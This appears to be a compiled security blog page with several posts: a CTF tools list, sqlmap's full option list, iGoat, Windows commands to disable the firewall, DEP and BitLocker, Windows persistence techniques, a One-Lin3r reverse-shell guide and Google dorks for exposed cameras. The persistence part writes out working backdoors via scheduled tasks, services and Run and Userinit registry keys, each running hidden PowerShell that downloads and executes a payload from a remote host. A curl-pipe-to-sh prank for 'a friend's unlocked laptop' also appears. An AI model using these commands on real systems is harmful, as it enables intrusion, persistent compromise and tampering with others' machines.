Capture The Flag (CTF) – Tools

(Some of the tools are quite old but can still be useful though)

Collection of setup scripts to create an install of various security research tools. Of course, this isn’t a hard problem, but it’s really nice to have them in one place that’s easily deployable to new machines and so forth. The install-scripts for these tools are checked regularly, the results can be found on the build status page.

Installers for the following tools are included:

CategorySourceToolDescription
binaryDirectoryaflState-of-the-art fuzzer.
binaryDirectoryangrNext-generation binary analysis engine from Shellphish.
binaryDirectorybarfBinary Analysis and Reverse-engineering Framework.
binaryDirectorybindeadA static analysis tool for binaries.
binaryLibrarycapstoneMulti-architecture disassembly framework.
binaryDirectorychecksecCheck binary hardening settings.
binaryDirectorycodereasonSemantic Binary Code Analysis Framework.
binaryDirectorycrosstool-ngCross-compilers and cross-architecture tools.
binaryDirectorycross2A set of cross-compilation tools from a Japanese book on C.
binaryDirectoryelfkickersA set of utilities for working with ELF files.
binaryDirectoryelfparserQuickly determine the capabilities of an ELF binary through static analysis.
binaryDirectoryevilizeTool to create MD5 colliding binaries
binaryDirectorygdbUp-to-date gdb with python2 bindings.
binaryDirectorygdb-heapgdb extension for debugging heap issues.
binaryDirectorygefEnhanced environment for gdb.
binaryDirectoryhongfuzzA general-purpose, easy-to-use fuzzer with interesting analysis options.
binaryLibrarykeystoneLightweight multi-architecture assembler framework.
binaryDirectorylibheapgdb python library for examining the glibc heap (ptmalloc)
binaryLibraryliefLibrary to Instrument Executable Formats.
binaryDirectorymiasmReverse engineering framework in Python.
binaryDirectoryone_gadgetMagic gadget search for libc.
binaryDirectorypandaPlatform for Architecture-Neutral Dynamic Analysis.
binaryDirectorypathgrindPath-based, symbolically-assisted fuzzer.
binaryDirectorypedaEnhanced environment for gdb.
binaryDirectorypreenyA collection of helpful preloads (compiled for many architectures!).
binaryDirectorypwndbgEnhanced environment for gdb. Especially for pwning.
binaryDirectorypwntoolsUseful CTF utilities.
binaryDirectorypython-pinPython bindings for pin.
binaryDirectoryqemuLatest version of qemu!
binaryDirectoryqiraParallel, timeless debugger.
binaryDirectoryradare2Some crazy thing crowell likes.
binaryDirectoryrappelA linux-based assembly REPL.
binaryDirectoryropperAnother gadget finder.
binaryDirectoryrp++Another gadget finder.
binaryDirectoryrrRecord and Replay Debugging Framework
binaryDirectoryscratchabitEasily retargetable and hackable interactive disassembler
binaryDirectoryscratchablockYet another crippled decompiler project
binaryDirectoryseccomp-toolsProvides powerful tools for seccomp analysis
binaryDirectoryshellnoobShellcode writing helper.
binaryDirectoryshellsploitShellcode development kit.
binaryDirectorysnowmanCross-architecture decompiler.
binaryDirectorytaintgrindA valgrind taint analysis tool.
binaryLibraryunicornMulti-architecture CPU emulator framework.
binaryDirectoryvalgrindA Dynamic Binary Instrumentation framework with some built-in tools.
binaryDirectoryvillocVisualization of heap operations.
binaryDirectoryvirtualsocketA nice library to interact with binaries.
binaryDirectorywccThe Witchcraft Compiler Collection is a collection of compilation tools to perform binary black magic on the GNU/Linux and other POSIX platforms.
binaryDirectoryxropGadget finder.
binaryDirectorymanticoreManticore is a prototyping tool for dynamic binary analysis, with support for symbolic execution, taint analysis, and binary instrumentation.
forensicsDirectorybinwalkFirmware (and arbitrary file) analysis tool.
forensicsDirectorydislockerTool for reading Bitlocker encrypted partitions.
forensicsDirectoryfirmware-mod-kitTools for firmware packing/unpacking.
forensicsaptforemostFile carver.
forensicsDirectorypdf-parserTool for digging in PDF files
forensicsDirectorypeepdfPowerful Python tool to analyze PDF documents.
forensicsDirectoryscrdecA decoder for encoded Windows Scripts.
forensicsDirectorytestdiskTestdisk and photorec for file recovery.
cryptoDirectorycribdragInteractive crib dragging tool (for crypto).
cryptoDirectoryfastcollAn md5sum collision generator.
cryptoDirectoryforesightA tool for predicting the output of random number generators. To run, launch “foresee”.
cryptoDirectoryfeatherdusterAn automated, modular cryptanalysis tool.
cryptoDirectorygaloisA fast galois field arithmetic library/toolkit.
cryptoDirectoryhashkillHash cracker.
cryptoDirectoryhashpumpA tool for performing hash length extension attaacks.
cryptoDirectoryhashpump-partialhashHashpump, supporting partially-unknown hashes.
cryptoDirectoryhash-identifierSimple hash algorithm identifier.
cryptoDirectorylibc-databaseBuild a database of libc offsets to simplify exploitation.
cryptoDirectorylittleblackboxDatabase of private SSL/SSH keys for embedded devices.
cryptoDirectorymsieveMsieve is a C library implementing a suite of algorithms to factor large integers.
cryptoDirectorynonce-disrespectNonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS.
cryptoDirectorypemcrackSSL PEM file cracker.
cryptoDirectorypkcrackPkZip encryption cracker.
cryptoDirectorypython-paddingoraclePadding oracle attack automation.
cryptoDirectoryrevengCRC finder.
cryptoDirectoryssh_decoderA tool for decoding ssh traffic. You will need ruby1.8 from https://launchpad.net/~brightbox/+archive/ubuntu/ruby-ng to run this. Run with ssh_decoder --help for help, as running it with no arguments causes it to crash.
cryptoDirectorysslsplitSSL/TLS MITM.
cryptoDirectoryxortoolXOR analysis tool.
cryptoDirectoryyafuAutomated integer factorization.
webDirectoryburpsuiteWeb proxy to do naughty web stuff.
webDirectorycommixCommand injection and exploitation tool.
webDirectorydirbWeb path scanner.
webDirectorydirsearchWeb path scanner.
webDirectorymitmproxyCLI Web proxy and python library.
webDirectorysqlmapSQL injection automation engine.
webDirectorysubbruteA DNS meta-query spider that enumerates DNS records, and subdomains.
stegoaptpngtoolsPNG’s analysis tool.
stegoDirectorysound-visualizerAudio file visualization.
stegoDirectorysteganabaraAnother image stenography solver.
stegoDirectorystegdetectStenography detection/breaking tool.
stegoDockerstego-toolkitA docker image with dozens of steg tools.
stegoDirectorystegsolveImage stenography solver.
stegoDirectorystegosaurusA steganography tool for embedding arbitrary payloads in Python bytecode (pyc or pyo) files.
stegoDirectoryzstegdetect stegano-hidden data in PNG & BMP.
dsniffaptdsniffGrabs passwords and other data from pcaps/network streams.
androidDirectoryapktoolDissect, dis-assemble, and re-pack Android APKs
androidDirectoryandroid-sdkThe android SDK (adb, emulator, etc).
miscDirectoryxspyTiny tool to spy on X sessions.
miscDirectoryz3Theorem prover from Microsoft Research.
miscDirectoryjdguiJava decompiler.
miscDirectoryvelesBinary data analysis and visualization tool.
miscDirectoryyoutube-dlLatest version of the popular youtube downloader.

There are also some installers for non-CTF stuff to break the monotony!

CategoryToolDescription
C magicC-bindA library used to enable function binding in C!
gameDwarf FortressSomething to help you relax after a CTF!
pyvmmonitorpyvmmonitorPyVmMonitor is a profiler with a simple goal: being the best way to profile a Python program.
library collectionsingle_file_libsA large collection of useful single file include libraries written for C/C++
dolphinsudolphinIf your friend ever leaves their laptop unlocked, curl -sSL sh.sudolph.in | sh then wait and see!
tor-browsertor-browserUseful when you need to hit a web challenge from different IPs.

Usage

To use, do:

# set up the path
/path/to/ctf-tools/bin/manage-tools setup
source ~/.bashrc
# list the available tools
manage-tools list
# install gdb, allowing it to try to sudo install dependencies
manage-tools -s install gdb
# install pwntools, but don't let it sudo install dependencies
manage-tools install pwntools
# install qemu, but use "nice" to avoid degrading performance during compilation
manage-tools -n install qemu
# uninstall gdb
manage-tools uninstall gdb
# uninstall all tools
manage-tools uninstall all
# search for a tool
manage-tools search preload

Where possible, the tools keep the installs very self-contained (i.e., in to tool/ directory), and most uninstalls are just calls to git clean (NOTE, this is NOT careful; everything under the tool directory, including whatever you were working on, is blown away during an uninstall). One exception to this are python tools, which are installed using the pip package manager if possible. A ctftools virtualenv is created during the manage-tools setup command and can be accessed using the command workon ctftools.

Help!

Something not working? I didn’t write (almost) any of these tools, but hit up #ctf-tools on freenode if you’re desperate. Maybe some kind soul will help!

Docker (version 1.7+)

By popular demand, a Dockerfile has been included. You can build a docker image with:

git clone https://github.com/zardus/ctf-tools
cd ctf-tools
docker build -t ctf-tools .

And run it with:

docker run -it ctf-tools

The built image will have ctf-tools cloned and ready to go, but you will still need to install the tools themselves (see above).

Alternatively, you can also pull ctf-tools (with some tools preinstalled) from dockerhub:

docker run -it zardus/ctf-tools

Vagrant

You can build a Vagrant VM with:

wget https://raw.githubusercontent.com/zardus/ctf-tools/master/Vagrantfile
vagrant plugin install vagrant-vbguest
vagrant up

And connect to it via:

vagrant ssh

Kali Linux

Kali Linux (Sana and Rolling), due to manually setting certain libraries to not use the latest version available (sometimes being out of date by years) causes some tools to not install at all, or fail in strange ways. AFL and Panda comes to mind, in fact any tool that uses QEMU 2.30 will probably fail during compilation under Kali. Overriding these libraries breaks other tools included in Kali so your only solution is to either live with some of Kali’s tools being broken, or running another distribution separately such as Ubuntu.

Most tools aren’t affected though.

Adding Tools

To add a tool (say, named toolname), do the following:

  1. Create a toolname directory.
  2. Create an install script.
  3. (optional) if special uninstall steps are required, create an uninstall script.

Install Scripts

The install script will be run with $PWD being toolname. It should install the tool into this directory, in as contained a manner as possible. Ideally, full uninstallation should be possible with a git clean.

The install script should create a bin directory and put its executables there. These executables will be automatically linked into the main bin directory for the repo. They could be launched from any directory, so don’t make assumptions about the location of $0!

License

The individual tools are all licensed under their own licenses. As for ctf-tools itself, it is licensed under BSD 2-Clause License. If you find it useful, star it on github (https://github.com/zardus/ctf-tools).

Resource

https://github.com/zardus/ctf-tools

Open source automatic SQL injection & database takeover tool

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap
sqlmap

Installation

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Usage

Get a list of basic options and switches:

python sqlmap.py -h

Get a list of all options and switches:

python sqlmap.py -hh

Official User Manual

Usage: python sqlmap.py [options]
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
  Target:
    At least one of these options has to be provided to define the
    target(s)
    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
  Request:
    These options can be used to specify how to connect to the target URL
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
  Optimization:
    These options can be used to optimize the performance of sqlmap
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
  Detection:
    These options can be used to customize the detection phase
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
  Brute force:
    These options can be used to run brute force checks
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
  User-defined function injection:
    These options can be used to create custom user-defined functions
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
  General:
    These options can be used to set some general working parameters
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing of response data
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap
  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS protection
    --list-tampers      Display list of available tamper scripts
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

More can be found here: https://github.com/sqlmapproject/sqlmap/wiki/Usage

http://sqlmap.org/

https://github.com/sqlmapproject/sqlmap/


iGoat – A Learning Tool for iOS App Pentesting and Security (Open Web Application Security Project – OWASP)

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.) and mobile app pentesters. It was inspired by the WebGoat project, and has a similar conceptual flow to it.

As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson.

The lessons are laid out in the following steps:

  1. Brief introduction to the problem.
  2. Verify the problem by exploiting it.
  3. Brief description of available remediations to the problem.
  4. Fix the problem by correcting and rebuilding the iGoat program.

Step 4 is optional, but highly recommended for all iOS developers. Assistance is available within iGoat if you don’t know how to fix a specific problem.

Vulnerabities Covered (version 3.0):

  • Key Management
    • Hardcoded Encryption Keys
    • Key Storage Server Side
    • Random Key Generation
  • URL Scheme Attack
  • Social Engineering
  • Reverse Engineering
    • String Analysis
  • Data Protection (Rest)
    • Local Data Storage (SQLite)
    • Plist Storage
    • Keychain Usage
    • NSUserDefaults Storage
  • Data Protection (Transit)
    • Server Communication
    • Public Key Pinning
  • Authentication
    • Remote Authentication
  • Side Channel Data Leaks
    • Device Logs
    • Cut-and-Paste
    • Backgrounding
    • Keystroke Logging
  • Tampering
    • Method Swizzling
  • Injection Flaws
    • SQL Injection
    • Cross Site Scripting
  • Broken Cryptography

More on: https://github.com/owasp/igoat


Windows Operating System Penetration – Disable security measures via commands

We must have obtained admin privilege first, then execute following commands under administrator privilege.

  • Disable built-in firewall
netsh advfirewall set allprofiles state off
Disable Windows firewall
Disable Windows firewall

  • Disable Windows Defender (Via sc stop or net stop command, or via registry)

  • Disable DEP
bcdedit.exe /set {current} nx AlwaysOff 

  • Disable Bitlocker
manage-bde -off C:

(Use following command to check Bitlocker status)

manage-bde -status C:
manage-bde
manage-bde

A tool for DNS Recon, Brute Forcer, Email Enumeration etc. – Bluto

DNS Recon | Brute Forcer | DNS Zone Transfer | DNS Wild Card Checks | DNS Wild Card Brute Forcer | Email Enumeration | Staff Enumeration | Compromised Account Enumeration | MetaData Harvesting

Bluto
Bluto

Pip Install Instructions

Note: To test if pip is already installed execute.

pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.

curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions

(1) Once pip has successfully downloaded and installed, we can install Bluto:

sudo pip install bluto

(2) You should now be able to execute ‘bluto’ from any working directory in any terminal.

bluto

Upgrade Instructions

(1) The upgrade process is as simple as;

sudo pip install bluto --upgrade

https://github.com/darryllane/Bluto


Common ways to maintaining privilege/access in Windows, Backdoor, Fileless backdoor

In order to be able to protect the system from intrusion, we need to understand how the privilege maintaining works.

Windows Task Scheduler

Use Windows Task Scheduler to launch recurring tasks such as script, software etc.

schtasks /create /sc minute /mo 1 /tn "Update Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.0.0.5:8080/fun.png\"\"\"))\""

Note: When execute in command prompt, single quote will be replace to double quot, here we use three double quotes.

This script will launch every 1 minute

Windows Task Scheduler
Windows Task Scheduler

Autostart Service

sc create "Backdoor" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""
sc description Backdoor "Backdoor Test"        //Description for the service
sc config Backdoor start= auto                //Make it auto-start
net start Backdoor                            //Start the service
Windows Services
Windows Services

WMI

We can utilize “powersploit” module from “powersploit”

Import-Module .\Persistence\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '1 PM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

Registry

Add backdoor path to auto-run key, to start the backdoor on system boot

Common auto-start keys

# Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Winlogon\Userinit Key
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

(There are many other similar keys related to auto-start)

Use following command to create fileless backdoor

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "KeyNameBackdoor" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\"" /f

Logon Scripts Backdoor

Registry path:

HKEY_CURRENT_USER\Environment\

Create string key:

UserInitMprLogonScript

Set Value to absolute path:

C:\backdoor.bat

userinit Fileless Backdoor

When login, winlogon will run specified program. It can be used to Add/Remove program.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
 "Userinit"="C:\Windows\system32\userinit.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""

Group Policy logon script

Run -> gpedit.msc -> User Configuration -> Scripts (Logon/Logoff)

Windows Local Group Policy Editor
Windows Local Group Policy Editor

Note: Must use full path e.g. “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”

DLL Hijacking

If an process is trying to load a dll without absolute path, Windows will try to look for the dll from specified folder. If one of the folders can by modified by the attacker, the malicious dll will be loaded, then the malicious code will be executed.

Common attack like LPK.dll

Windows 7 and up have added KnownDLLs protection, add LPK.dll to following registry key to enable the dll hijacking

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\

Create String type of Key name it

ExcludeFromKnownDlls

Set the value to

LPK.dll

COM hijacking

The key is to create correct dll and choose right CLSID, by changing CLSID key value from registry, CAccPropServicesClass hacking and MMDeviceEnumerator hijacking can be carried out.
Many system processes will invoke them when starting. It can bypass auto-start checks from Autoruns.

Remote Control, Remote Access Trojan (RAT)

RAT is a type of malicious program it includs backdoors on victims’ devices. Usually propagate by normal client requests, e.g. email attachments, game program. etc. Attacker use them on clients’ device to spread RAT, eventually build botnet.

To keep the system safe and away from backdoors, we have to have knowledge in troubleshooting intrusion, keep the system up to date, check server security regularly.

One-Lin3r – Penetration test with one line (Installation on Kali Linux)

One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won’t even need to copy the one-liners).

One-liner functionWhat this function refers to
Reverse ShellVarious methods and commands to give you a reverse shell.
PrivEscMany commands to help in Enumeration and Privilege Escalation
Bind ShellVarious methods and commands to give you a bind shell.
DropperMany ways to download and execute various payload types with various methods.

Install on Kali Linux

1 Launch terminal

2 Install One-Lin3r

~# pip3 install one-lin3r
Install One-Lin3r
Install One-Lin3r

3 Force reinstall “prompt-toolkit”

~# pip3 install prompt-toolkit --force-reinstall
Kali Linux - pip3 install prompt-toolkit --force-reinstall
Kali Linux – pip3 install prompt-toolkit –force-reinstall

Or we will get following error by launch “one-lin3r -h” straight way without reinstalling “prompt-toolkit”

Traceback (most recent call last):
   File "/usr/local/bin/one-lin3r", line 6, in 
     from one_lin3r.main import main
   File "/usr/local/lib/python3.7/dist-packages/one_lin3r/main.py", line 3, in 
     from .core import Cli
   File "/usr/local/lib/python3.7/dist-packages/one_lin3r/core/Cli.py", line 6, in 
     from . import utils,db
   File "/usr/local/lib/python3.7/dist-packages/one_lin3r/core/utils.py", line 5, in 
     from prompt_toolkit.shortcuts import CompleteStyle, prompt
 ImportError: cannot import name 'CompleteStyle' from 'prompt_toolkit.shortcuts' (/usr/lib/python3/dist-packages/prompt_toolkit/shortcuts.py)
Kali Linux, one-lin3r -h error
Kali Linux, one-lin3r -h error

4 Try launch one-lin3r -h

~# one-lin3r -h
Kali Linux - one-lin3r -h
Kali Linux – one-lin3r -h

5 Now we can close terminal window then launch from terminal or menu

one-lin3r from menu
one-lin3r from menu
one-lin3r from terminal
one-lin3r from terminal

Usage

Launch

~# one-lin3r
one-lin3r from terminal
one-lin3r from terminal
One-Lin3r
One-Lin3r

Other commands

One-Lin3r  -> list
One-Lin3r -> list
usage: one-lin3r [-h] [-r R] [-x X] [-q]
 optional arguments:
   -h, --help  show this help message and exit
   -r          Execute a resource file (history file).
   -x          Execute a specific command (use ; for multiples).
   -q          Quiet mode (no banner).

More on: github.com/D4Vinci/One-Lin3r

Bonus

Next we can use nc to listen on the port from the reverse connection (reverse shell)

~# nc -lvp 1500
listening on [any] 1500 …
 nc -lvp 1500
nc -lvp 1500

Once we have connected to the victim then we need to think about privilege escalation, which One-Lin3r also contains some handy privesc commands for us to generate and use

one-lin3r -> search windows privesc
one-lin3r -> search windows privesc

Search Hacking, Google Hacking, Google Dork, Shodan

Google

QueryDescriptionExample
filetypeSearch for file typefiletype:txt
inurlSearch URLinurl:”/login.html”
intextSearch Text from articlesintext:”Download”
intitleSearch Titleintitle:”Joomla”

Documents

"default username password" filetype:pdf
"scanned by camscanner" filetype:pdf
Document with default username and password included
Document with default username and password included

Data

intitle:"Namenode information" AND inurl:":50070/dfshealth.html"
hadoop HDFS
hadoop HDFS

intitle:"netdata dashboard" AND intext:"Costa Tsaousis"
netdata dashboard
netdata dashboard

Video

intitle:"Live View / – AXIS"
intitle:"Network Camera NetworkCamera"
intitle:"Yawcam" inurl:8081
intitle:"VB Viewer"
inurl:embed.html inurl:dvr
inurl:/guestimage.html
